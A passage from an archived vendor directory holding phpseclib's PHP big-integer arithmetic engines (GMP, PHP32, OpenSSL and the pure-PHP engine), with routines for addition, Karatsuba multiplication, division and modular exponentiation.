$x->divide($n); return $x->normalize($temp); } if ($e->value == [2]) { $temp = new $class(); $temp->value = $class::square($x->value); list(, $temp) = $temp->divide($n); return $x->normalize($temp); } return $x->normalize(static::slidingWindow($x, $e, $n, $class)); } /** * Modular reduction preparation * * @param array $x * @param array $n * @param string $class * @see self::slidingWindow() * @return array */ protected static function prepareReduce(array $x, array $n, $class) { return static::reduce($x, $n, $class); } /** * Modular multiply * * @param array $x * @param array $y * @param array $n * @param string $class * @see self::slidingWindow() * @return array */ protected static function multiplyReduce(array $x, array $y, array $n, $class) { $temp = $class::multiplyHelper($x, false, $y, false); return static::reduce($temp[self::VALUE], $n, $class); } /** * Modular square * * @param array $x * @param array $n * @param string $class * @see self::slidingWindow() * @return array */ protected static function squareReduce(array $x, array $n, $class) { return static::reduce($class::square($x), $n, $class); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/GMP.php000064400000040300147600400120023402 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; use phpseclib3\Exception\BadConfigurationException; /** * GMP Engine. * * @author Jim Wigginton */ class GMP extends Engine { /** * Can Bitwise operations be done fast? * * @see parent::bitwise_leftRotate() * @see parent::bitwise_rightRotate() */ const FAST_BITWISE = true; /** * Engine Directory * * @see parent::setModExpEngine */ const ENGINE_DIR = 'GMP'; /** * Test for engine validity * * @return bool * @see parent::__construct() */ public static function isValidEngine() { return extension_loaded('gmp'); } /** * Default constructor * * @param mixed $x integer Base-10 number or base-$base number if $base set. * @param int $base * @see parent::__construct() */ public function __construct($x = 0, $base = 10) { if (!isset(static::$isValidEngine[static::class])) { static::$isValidEngine[static::class] = self::isValidEngine(); } if (!static::$isValidEngine[static::class]) { throw new BadConfigurationException('GMP is not setup correctly on this system'); } if ($x instanceof \GMP) { $this->value = $x; return; } $this->value = gmp_init(0); parent::__construct($x, $base); } /** * Initialize a GMP BigInteger Engine instance * * @param int $base * @see parent::__construct() */ protected function initialize($base) { switch (abs($base)) { case 256: $this->value = gmp_import($this->value); if ($this->is_negative) { $this->value = -$this->value; } break; case 16: $temp = $this->is_negative ? '-0x' . $this->value : '0x' . $this->value; $this->value = gmp_init($temp); break; case 10: $this->value = gmp_init(isset($this->value) ? $this->value : '0'); } } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { return (string)$this->value; } /** * Converts a BigInteger to a bit string (eg. base-2). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * * @param bool $twos_compliment * @return string */ public function toBits($twos_compliment = false) { $hex = $this->toHex($twos_compliment); $bits = gmp_strval(gmp_init($hex, 16), 2); if ($this->precision > 0) { $bits = substr($bits, -$this->precision); } if ($twos_compliment && $this->compare(new static()) > 0 && $this->precision <= 0) { return '0' . $bits; } return $bits; } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = false) { if ($twos_compliment) { return $this->toBytesHelper(); } if (gmp_cmp($this->value, gmp_init(0)) == 0) { return $this->precision > 0 ? str_repeat(chr(0), ($this->precision + 1) >> 3) : ''; } $temp = gmp_export($this->value); return $this->precision > 0 ? substr(str_pad($temp, $this->precision >> 3, chr(0), STR_PAD_LEFT), -($this->precision >> 3)) : ltrim($temp, chr(0)); } /** * Adds two BigIntegers. * * @param GMP $y * @return GMP */ public function add(GMP $y) { $temp = new self(); $temp->value = $this->value + $y->value; return $this->normalize($temp); } /** * Subtracts two BigIntegers. * * @param GMP $y * @return GMP */ public function subtract(GMP $y) { $temp = new self(); $temp->value = $this->value - $y->value; return $this->normalize($temp); } /** * Multiplies two BigIntegers. * * @param GMP $x * @return GMP */ public function multiply(GMP $x) { $temp = new self(); $temp->value = $this->value * $x->value; return $this->normalize($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param GMP $y * @return array{GMP, GMP} */ public function divide(GMP $y) { $quotient = new self(); $remainder = new self(); list($quotient->value, $remainder->value) = gmp_div_qr($this->value, $y->value); if (gmp_sign($remainder->value) < 0) { $remainder->value = $remainder->value + gmp_abs($y->value); } return [$this->normalize($quotient), $this->normalize($remainder)]; } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this * is demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param GMP $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(GMP $y) { $r = gmp_cmp($this->value, $y->value); if ($r < -1) { $r = -1; } if ($r > 1) { $r = 1; } return $r; } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param GMP $x * @return bool */ public function equals(GMP $x) { return $this->value == $x->value; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param GMP $n * @return false|GMP */ public function modInverse(GMP $n) { $temp = new self(); $temp->value = gmp_invert($this->value, $n->value); return $temp->value === false ? false : $this->normalize($temp); } /** * Calculates the greatest common divisor and Bezout's identity. * * Say you have 693 and 609. The GCD is 21. Bezout's identity states that there exist integers x and y such that * 693*x + 609*y == 21. In point of fact, there are actually an infinite number of x and y combinations and which * combination is returned is dependent upon which mode is in use. See * {@link http://en.wikipedia.org/wiki/B%C3%A9zout%27s_identity Bezout's identity - Wikipedia} for more information. * * @param GMP $n * @return GMP[] */ public function extendedGCD(GMP $n) { extract(gmp_gcdext($this->value, $n->value)); return [ 'gcd' => $this->normalize(new self($g)), 'x' => $this->normalize(new self($s)), 'y' => $this->normalize(new self($t)) ]; } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param GMP $n * @return GMP */ public function gcd(GMP $n) { $r = gmp_gcd($this->value, $n->value); return $this->normalize(new self($r)); } /** * Absolute value. * * @return GMP */ public function abs() { $temp = new self(); $temp->value = gmp_abs($this->value); return $temp; } /** * Logical And * * @param GMP $x * @return GMP */ public function bitwise_and(GMP $x) { $temp = new self(); $temp->value = $this->value & $x->value; return $this->normalize($temp); } /** * Logical Or * * @param GMP $x * @return GMP */ public function bitwise_or(GMP $x) { $temp = new self(); $temp->value = $this->value | $x->value; return $this->normalize($temp); } /** * Logical Exclusive Or * * @param GMP $x * @return GMP */ public function bitwise_xor(GMP $x) { $temp = new self(); $temp->value = $this->value ^ $x->value; return $this->normalize($temp); } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return GMP */ public function bitwise_rightShift($shift) { // 0xFFFFFFFF >> 2 == -1 (on 32-bit systems) // gmp_init('0xFFFFFFFF') >> 2 == gmp_init('0x3FFFFFFF') $temp = new self(); $temp->value = $this->value >> $shift; return $this->normalize($temp); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return GMP */ public function bitwise_leftShift($shift) { $temp = new self(); $temp->value = $this->value << $shift; return $this->normalize($temp); } /** * Performs modular exponentiation. * * @param GMP $e * @param GMP $n * @return GMP */ public function modPow(GMP $e, GMP $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param GMP $e * @param GMP $n * @return GMP */ public function powMod(GMP $e, GMP $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * @param GMP $e * @param GMP $n * @return GMP */ protected function powModInner(GMP $e, GMP $n) { $class = static::$modexpEngine[static::class]; return $class::powModHelper($this, $e, $n); } /** * Normalize * * Removes leading zeros and truncates (if necessary) to maintain the appropriate precision * * @param GMP $result * @return GMP */ protected function normalize(GMP $result) { $result->precision = $this->precision; $result->bitmask = $this->bitmask; if ($result->bitmask !== false) { $flip = $result->value < 0; if ($flip) { $result->value = -$result->value; } $result->value = $result->value & $result->bitmask->value; if ($flip) { $result->value = -$result->value; } } return $result; } /** * Performs some post-processing for randomRangePrime * * @param Engine $x * @param Engine $min * @param Engine $max * @return GMP */ protected static function randomRangePrimeInner(Engine $x, Engine $min, Engine $max) { $p = gmp_nextprime($x->value); if ($p <= $max->value) { return new self($p); } if ($min->value != $x->value) { $x = new self($x->value - 1); } return self::randomRangePrime($min, $x); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param GMP $min * @param GMP $max * @return false|GMP */ public static function randomRangePrime(GMP $min, GMP $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param GMP $min * @param GMP $max * @return GMP */ public static function randomRange(GMP $min, GMP $max) { return self::randomRangeHelper($min, $max); } /** * Make the current number odd * * If the current number is odd it'll be unchanged. If it's even, one will be added to it. * * @see self::randomPrime() */ protected function make_odd() { gmp_setbit($this->value, 0); } /** * Tests Primality * * @param int $t * @return bool */ protected function testPrimality($t) { return gmp_prob_prime($this->value, $t) != 0; } /** * Calculates the nth root of a biginteger. * * Returns the nth root of a positive biginteger, where n defaults to 2 * * @param int $n * @return GMP */ protected function rootInner($n) { $root = new self(); $root->value = gmp_root($this->value, $n); return $this->normalize($root); } /** * Performs exponentiation. * * @param GMP $n * @return GMP */ public function pow(GMP $n) { $temp = new self(); $temp->value = $this->value ** $n->value; return $this->normalize($temp); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param GMP ...$nums * @return GMP */ public static function min(GMP ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param GMP ...$nums * @return GMP */ public static function max(GMP ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param GMP $min * @param GMP $max * @return bool */ public function between(GMP $min, GMP $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } /** * Create Recurring Modulo Function * * Sometimes it may be desirable to do repeated modulos with the same number outside of * modular exponentiation * * @return callable */ public function createRecurringModuloFunction() { $temp = $this->value; return function (GMP $x) use ($temp) { return new GMP($x->value % $temp); }; } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param GMP $r * @return int */ public static function scan1divide(GMP $r) { $s = gmp_scan1($r->value, 0); $r->value >>= $s; return $s; } /** * Is Odd? * * @return bool */ public function isOdd() { return gmp_testbit($this->value, 0); } /** * Tests if a bit is set * * @return bool */ public function testBit($x) { return gmp_testbit($this->value, $x); } /** * Is Negative? * * @return bool */ public function isNegative() { return gmp_sign($this->value) == -1; } /** * Negate * * Given $k, returns -$k * * @return GMP */ public function negate() { $temp = clone $this; $temp->value = -$this->value; return $temp; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP32.php000064400000021571147600400120023564 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; /** * Pure-PHP 32-bit Engine. * * Uses 64-bit floats if int size is 4 bits * * @author Jim Wigginton */ class PHP32 extends PHP { // Constants used by PHP.php const BASE = 26; const BASE_FULL = 0x4000000; const MAX_DIGIT = 0x3FFFFFF; const MSB = 0x2000000; /** * MAX10 in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10 = 10000000; /** * MAX10LEN in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10LEN = 7; const MAX_DIGIT2 = 4503599627370496; /** * Initialize a PHP32 BigInteger Engine instance * * @param int $base * @see parent::initialize() */ protected function initialize($base) { if ($base != 256 && $base != -256) { return parent::initialize($base); } $val = $this->value; $this->value = []; $vals = &$this->value; $i = strlen($val); if (!$i) { return; } while (true) { $i -= 4; if ($i < 0) { if ($i == -4) { break; } $val = substr($val, 0, 4 + $i); $val = str_pad($val, 4, "\0", STR_PAD_LEFT); if ($val == "\0\0\0\0") { break; } $i = 0; } list(, $digit) = unpack('N', substr($val, $i, 4)); if ($digit < 0) { $digit += 0xFFFFFFFF + 1; } $step = count($vals) & 3; if ($step) { $digit = (int) floor($digit / pow(2, 2 * $step)); } if ($step != 3) { $digit = (int) fmod($digit, static::BASE_FULL); $i++; } $vals[] = $digit; } while (end($vals) === 0) { array_pop($vals); } reset($vals); } /** * Test for engine validity * * @see parent::__construct() * @return bool */ public static function isValidEngine() { return PHP_INT_SIZE >= 4 && !self::testJITOnWindows(); } /** * Adds two BigIntegers. * * @param PHP32 $y * @return PHP32 */ public function add(PHP32 $y) { $temp = self::addHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Subtracts two BigIntegers. * * @param PHP32 $y * @return PHP32 */ public function subtract(PHP32 $y) { $temp = self::subtractHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Multiplies two BigIntegers. * * @param PHP32 $y * @return PHP32 */ public function multiply(PHP32 $y) { $temp = self::multiplyHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param PHP32 $y * @return array{PHP32, PHP32} */ public function divide(PHP32 $y) { return $this->divideHelper($y); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP32 $n * @return false|PHP32 */ public function modInverse(PHP32 $n) { return $this->modInverseHelper($n); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP32 $n * @return PHP32[] */ public function extendedGCD(PHP32 $n) { return $this->extendedGCDHelper($n); } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param PHP32 $n * @return PHP32 */ public function gcd(PHP32 $n) { return $this->extendedGCD($n)['gcd']; } /** * Logical And * * @param PHP32 $x * @return PHP32 */ public function bitwise_and(PHP32 $x) { return $this->bitwiseAndHelper($x); } /** * Logical Or * * @param PHP32 $x * @return PHP32 */ public function bitwise_or(PHP32 $x) { return $this->bitwiseOrHelper($x); } /** * Logical Exclusive Or * * @param PHP32 $x * @return PHP32 */ public function bitwise_xor(PHP32 $x) { return $this->bitwiseXorHelper($x); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this is * demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param PHP32 $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(PHP32 $y) { return $this->compareHelper($this->value, $this->is_negative, $y->value, $y->is_negative); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param PHP32 $x * @return bool */ public function equals(PHP32 $x) { return $this->value === $x->value && $this->is_negative == $x->is_negative; } /** * Performs modular exponentiation. * * @param PHP32 $e * @param PHP32 $n * @return PHP32 */ public function modPow(PHP32 $e, PHP32 $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param PHP32 $e * @param PHP32 $n * @return PHP32 */ public function powMod(PHP32 $e, PHP32 $n) { return $this->powModOuter($e, $n); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param PHP32 $min * @param PHP32 $max * @return false|PHP32 */ public static function randomRangePrime(PHP32 $min, PHP32 $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param PHP32 $min * @param PHP32 $max * @return PHP32 */ public static function randomRange(PHP32 $min, PHP32 $max) { return self::randomRangeHelper($min, $max); } /** * Performs exponentiation. * * @param PHP32 $n * @return PHP32 */ public function pow(PHP32 $n) { return $this->powHelper($n); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param PHP32 ...$nums * @return PHP32 */ public static function min(PHP32 ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param PHP32 ...$nums * @return PHP32 */ public static function max(PHP32 ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param PHP32 $min * @param PHP32 $max * @return bool */ public function between(PHP32 $min, PHP32 $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/OpenSSL.php000064400000003713147600400120024251 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; use phpseclib3\Crypt\RSA\Formats\Keys\PKCS8; use phpseclib3\Math\BigInteger; /** * OpenSSL Modular Exponentiation Engine * * @author Jim Wigginton */ abstract class OpenSSL { /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return extension_loaded('openssl') && static::class != __CLASS__; } /** * Performs modular exponentiation. * * @param Engine $x * @param Engine $e * @param Engine $n * @return Engine */ public static function powModHelper(Engine $x, Engine $e, Engine $n) { if ($n->getLengthInBytes() < 31 || $n->getLengthInBytes() > 16384) { throw new \OutOfRangeException('Only modulo between 31 and 16384 bits are accepted'); } $key = PKCS8::savePublicKey( new BigInteger($n), new BigInteger($e) ); $plaintext = str_pad($x->toBytes(), $n->getLengthInBytes(), "\0", STR_PAD_LEFT); // this is easily prone to failure. if the modulo is a multiple of 2 or 3 or whatever it // won't work and you'll get a "failure: error:0906D06C:PEM routines:PEM_read_bio:no start line" // error. i suppose, for even numbers, we could do what PHP\Montgomery.php does, but then what // about odd numbers divisible by 3, by 5, etc? if (!openssl_public_encrypt($plaintext, $result, $key, OPENSSL_NO_PADDING)) { throw new \UnexpectedValueException(openssl_error_string()); } $class = get_class($x); return new $class($result, 256); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP.php000064400000114027147600400120023416 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Math\BigInteger\Engines; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\BadConfigurationException; /** * Pure-PHP Engine. * * @author Jim Wigginton */ abstract class PHP extends Engine { /**#@+ * Array constants * * Rather than create a thousands and thousands of new BigInteger objects in repeated function calls to add() and * multiply() or whatever, we'll just work directly on arrays, taking them in as parameters and returning them. * */ /** * $result[self::VALUE] contains the value. */ const VALUE = 0; /** * $result[self::SIGN] contains the sign. */ const SIGN = 1; /**#@-*/ /** * Karatsuba Cutoff * * At what point do we switch between Karatsuba multiplication and schoolbook long multiplication? * */ const KARATSUBA_CUTOFF = 25; /** * Can Bitwise operations be done fast? * * @see parent::bitwise_leftRotate() * @see parent::bitwise_rightRotate() */ const FAST_BITWISE = true; /** * Engine Directory * * @see parent::setModExpEngine */ const ENGINE_DIR = 'PHP'; /** * Default constructor * * @param mixed $x integer Base-10 number or base-$base number if $base set. * @param int $base * @return PHP * @see parent::__construct() */ public function __construct($x = 0, $base = 10) { if (!isset(static::$isValidEngine[static::class])) { static::$isValidEngine[static::class] = static::isValidEngine(); } if (!static::$isValidEngine[static::class]) { throw new BadConfigurationException(static::class . ' is not setup correctly on this system'); } $this->value = []; parent::__construct($x, $base); } /** * Initialize a PHP BigInteger Engine instance * * @param int $base * @see parent::__construct() */ protected function initialize($base) { switch (abs($base)) { case 16: $x = (strlen($this->value) & 1) ? '0' . $this->value : $this->value; $temp = new static(Strings::hex2bin($x), 256); $this->value = $temp->value; break; case 10: $temp = new static(); $multiplier = new static(); $multiplier->value = [static::MAX10]; $x = $this->value; if ($x[0] == '-') { $this->is_negative = true; $x = substr($x, 1); } $x = str_pad( $x, strlen($x) + ((static::MAX10LEN - 1) * strlen($x)) % static::MAX10LEN, 0, STR_PAD_LEFT ); while (strlen($x)) { $temp = $temp->multiply($multiplier); $temp = $temp->add(new static($this->int2bytes(substr($x, 0, static::MAX10LEN)), 256)); $x = substr($x, static::MAX10LEN); } $this->value = $temp->value; } } /** * Pads strings so that unpack may be used on them * * @param string $str * @return string */ protected function pad($str) { $length = strlen($str); $pad = 4 - (strlen($str) % 4); return str_pad($str, $length + $pad, "\0", STR_PAD_LEFT); } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { if (!count($this->value)) { return '0'; } $temp = clone $this; $temp->bitmask = false; $temp->is_negative = false; $divisor = new static(); $divisor->value = [static::MAX10]; $result = ''; while (count($temp->value)) { list($temp, $mod) = $temp->divide($divisor); $result = str_pad( isset($mod->value[0]) ? $mod->value[0] : '', static::MAX10LEN, '0', STR_PAD_LEFT ) . $result; } $result = ltrim($result, '0'); if (empty($result)) { $result = '0'; } if ($this->is_negative) { $result = '-' . $result; } return $result; } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = false) { if ($twos_compliment) { return $this->toBytesHelper(); } if (!count($this->value)) { return $this->precision > 0 ? str_repeat(chr(0), ($this->precision + 1) >> 3) : ''; } $result = $this->bitwise_small_split(8); $result = implode('', array_map('chr', $result)); return $this->precision > 0 ? str_pad( substr($result, -(($this->precision + 7) >> 3)), ($this->precision + 7) >> 3, chr(0), STR_PAD_LEFT ) : $result; } /** * Performs addition. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return array */ protected static function addHelper(array $x_value, $x_negative, array $y_value, $y_negative) { $x_size = count($x_value); $y_size = count($y_value); if ($x_size == 0) { return [ self::VALUE => $y_value, self::SIGN => $y_negative ]; } elseif ($y_size == 0) { return [ self::VALUE => $x_value, self::SIGN => $x_negative ]; } // subtract, if appropriate if ($x_negative != $y_negative) { if ($x_value == $y_value) { return [ self::VALUE => [], self::SIGN => false ]; } $temp = self::subtractHelper($x_value, false, $y_value, false); $temp[self::SIGN] = self::compareHelper($x_value, false, $y_value, false) > 0 ? $x_negative : $y_negative; return $temp; } if ($x_size < $y_size) { $size = $x_size; $value = $y_value; } else { $size = $y_size; $value = $x_value; } $value[count($value)] = 0; // just in case the carry adds an extra digit $carry = 0; for ($i = 0, $j = 1; $j < $size; $i += 2, $j += 2) { //$sum = $x_value[$j] * static::BASE_FULL + $x_value[$i] + $y_value[$j] * static::BASE_FULL + $y_value[$i] + $carry; $sum = ($x_value[$j] + $y_value[$j]) * static::BASE_FULL + $x_value[$i] + $y_value[$i] + $carry; $carry = $sum >= static::MAX_DIGIT2; // eg. floor($sum / 2**52); only possible values (in any base) are 0 and 1 $sum = $carry ? $sum - static::MAX_DIGIT2 : $sum; $temp = static::BASE === 26 ? intval($sum / 0x4000000) : ($sum >> 31); $value[$i] = (int)($sum - static::BASE_FULL * $temp); // eg. a faster alternative to fmod($sum, 0x4000000) $value[$j] = $temp; } if ($j == $size) { // ie. if $y_size is odd $sum = $x_value[$i] + $y_value[$i] + $carry; $carry = $sum >= static::BASE_FULL; $value[$i] = $carry ? $sum - static::BASE_FULL : $sum; ++$i; // ie. let $i = $j since we've just done $value[$i] } if ($carry) { for (; $value[$i] == static::MAX_DIGIT; ++$i) { $value[$i] = 0; } ++$value[$i]; } return [ self::VALUE => self::trim($value), self::SIGN => $x_negative ]; } /** * Performs subtraction. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return array */ public static function subtractHelper(array $x_value, $x_negative, array $y_value, $y_negative) { $x_size = count($x_value); $y_size = count($y_value); if ($x_size == 0) { return [ self::VALUE => $y_value, self::SIGN => !$y_negative ]; } elseif ($y_size == 0) { return [ self::VALUE => $x_value, self::SIGN => $x_negative ]; } // add, if appropriate (ie. -$x - +$y or +$x - -$y) if ($x_negative != $y_negative) { $temp = self::addHelper($x_value, false, $y_value, false); $temp[self::SIGN] = $x_negative; return $temp; } $diff = self::compareHelper($x_value, $x_negative, $y_value, $y_negative); if (!$diff) { return [ self::VALUE => [], self::SIGN => false ]; } // switch $x and $y around, if appropriate. if ((!$x_negative && $diff < 0) || ($x_negative && $diff > 0)) { $temp = $x_value; $x_value = $y_value; $y_value = $temp; $x_negative = !$x_negative; $x_size = count($x_value); $y_size = count($y_value); } // at this point, $x_value should be at least as big as - if not bigger than - $y_value $carry = 0; for ($i = 0, $j = 1; $j < $y_size; $i += 2, $j += 2) { $sum = ($x_value[$j] - $y_value[$j]) * static::BASE_FULL + $x_value[$i] - $y_value[$i] - $carry; $carry = $sum < 0; // eg. floor($sum / 2**52); only possible values (in any base) are 0 and 1 $sum = $carry ? $sum + static::MAX_DIGIT2 : $sum; $temp = static::BASE === 26 ? intval($sum / 0x4000000) : ($sum >> 31); $x_value[$i] = (int)($sum - static::BASE_FULL * $temp); $x_value[$j] = $temp; } if ($j == $y_size) { // ie. if $y_size is odd $sum = $x_value[$i] - $y_value[$i] - $carry; $carry = $sum < 0; $x_value[$i] = $carry ? $sum + static::BASE_FULL : $sum; ++$i; } if ($carry) { for (; !$x_value[$i]; ++$i) { $x_value[$i] = static::MAX_DIGIT; } --$x_value[$i]; } return [ self::VALUE => self::trim($x_value), self::SIGN => $x_negative ]; } /** * Performs multiplication. * * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @return array */ protected static function multiplyHelper(array $x_value, $x_negative, array $y_value, $y_negative) { //if ( $x_value == $y_value ) { // return [ // self::VALUE => self::square($x_value), // self::SIGN => $x_sign != $y_value // ]; //} $x_length = count($x_value); $y_length = count($y_value); if (!$x_length || !$y_length) { // a 0 is being multiplied return [ self::VALUE => [], self::SIGN => false ]; } return [ self::VALUE => min($x_length, $y_length) < 2 * self::KARATSUBA_CUTOFF ? self::trim(self::regularMultiply($x_value, $y_value)) : self::trim(self::karatsuba($x_value, $y_value)), self::SIGN => $x_negative != $y_negative ]; } /** * Performs Karatsuba multiplication on two BigIntegers * * See {@link http://en.wikipedia.org/wiki/Karatsuba_algorithm Karatsuba algorithm} and * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=120 MPM 5.2.3}. * * @param array $x_value * @param array $y_value * @return array */ private static function karatsuba(array $x_value, array $y_value) { $m = min(count($x_value) >> 1, count($y_value) >> 1); if ($m < self::KARATSUBA_CUTOFF) { return self::regularMultiply($x_value, $y_value); } $x1 = array_slice($x_value, $m); $x0 = array_slice($x_value, 0, $m); $y1 = array_slice($y_value, $m); $y0 = array_slice($y_value, 0, $m); $z2 = self::karatsuba($x1, $y1); $z0 = self::karatsuba($x0, $y0); $z1 = self::addHelper($x1, false, $x0, false); $temp = self::addHelper($y1, false, $y0, false); $z1 = self::karatsuba($z1[self::VALUE], $temp[self::VALUE]); $temp = self::addHelper($z2, false, $z0, false); $z1 = self::subtractHelper($z1, false, $temp[self::VALUE], false); $z2 = array_merge(array_fill(0, 2 * $m, 0), $z2); $z1[self::VALUE] = array_merge(array_fill(0, $m, 0), $z1[self::VALUE]); $xy = self::addHelper($z2, false, $z1[self::VALUE], $z1[self::SIGN]); $xy = self::addHelper($xy[self::VALUE], $xy[self::SIGN], $z0, false); return $xy[self::VALUE]; } /** * Performs long multiplication on two BigIntegers * * Modeled after 'multiply' in MutableBigInteger.java. * * @param array $x_value * @param array $y_value * @return array */ protected static function regularMultiply(array $x_value, array $y_value) { $x_length = count($x_value); $y_length = count($y_value); if (!$x_length || !$y_length) { // a 0 is being multiplied return []; } $product_value = self::array_repeat(0, $x_length + $y_length); // the following for loop could be removed if the for loop following it // (the one with nested for loops) initially set $i to 0, but // doing so would also make the result in one set of unnecessary adds, // since on the outermost loops first pass, $product->value[$k] is going // to always be 0 $carry = 0; for ($j = 0; $j < $x_length; ++$j) { // ie. $i = 0 $temp = $x_value[$j] * $y_value[0] + $carry; // $product_value[$k] == 0 $carry = static::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $product_value[$j] = (int)($temp - static::BASE_FULL * $carry); } $product_value[$j] = $carry; // the above for loop is what the previous comment was talking about. the // following for loop is the "one with nested for loops" for ($i = 1; $i < $y_length; ++$i) { $carry = 0; for ($j = 0, $k = $i; $j < $x_length; ++$j, ++$k) { $temp = $product_value[$k] + $x_value[$j] * $y_value[$i] + $carry; $carry = static::BASE === 26 ? intval($temp / 0x4000000) : ($temp >> 31); $product_value[$k] = (int)($temp - static::BASE_FULL * $carry); } $product_value[$k] = $carry; } return $product_value; } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @return array{static, static} * @internal This function is based off of * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=9 HAC 14.20}. */ protected function 